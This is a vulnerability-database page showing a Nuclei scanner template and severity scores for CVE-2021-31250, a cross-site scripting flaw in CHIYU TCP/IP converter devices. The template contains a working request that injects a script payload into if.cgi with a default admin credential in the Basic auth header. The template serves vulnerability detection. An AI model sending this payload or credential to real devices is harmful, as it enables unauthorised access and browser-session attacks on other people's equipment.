Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-31250
HistoryJul 26, 2021 - 5:18 p.m.

CHIYU TCP/IP Converter - Cross-Site Scripting

2021-07-2617:18:45
ProjectDiscovery
github.com
9

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

0.971 High

EPSS

Percentile

99.8%

CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi.

id: CVE-2021-31250

info:
  name: CHIYU TCP/IP Converter - Cross-Site Scripting
  author: geeknik
  severity: medium
  description: CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    To mitigate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being rendered in web pages.
  reference:
    - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
    - https://www.chiyu-tech.com/msg/message-Firmware-update-87.htm
    - https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31250
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2021-31250
    cwe-id: CWE-79
    epss-score: 0.97029
    epss-percentile: 0.9975
    cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: chiyu-tech
    product: bf-430_firmware
  tags: cve2021,cve,chiyu,xss,iot,intrusive,chiyu-tech

http:
  - method: GET
    path:
      - "{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"

    headers:
      Authorization: Basic OmFkbWlu
    host-redirects: true

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - text/html

      - type: word
        part: body
        words:
          - '"><script>alert({{randstr}})</script>'
# digest: 4a0a00473045022001068e1ddaf3c98d6733d9d17ce3ca0f27152fa717d76ce4180805b2d3cbc1e0022100f9fea88e57be3c2358133f57b3ff53d4ecb3b4469d87698b45a12f487f25d320:922c64590222798bb761d5b6d8e72950

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

0.971 High

EPSS

Percentile

99.8%

Related for NUCLEI:CVE-2021-31250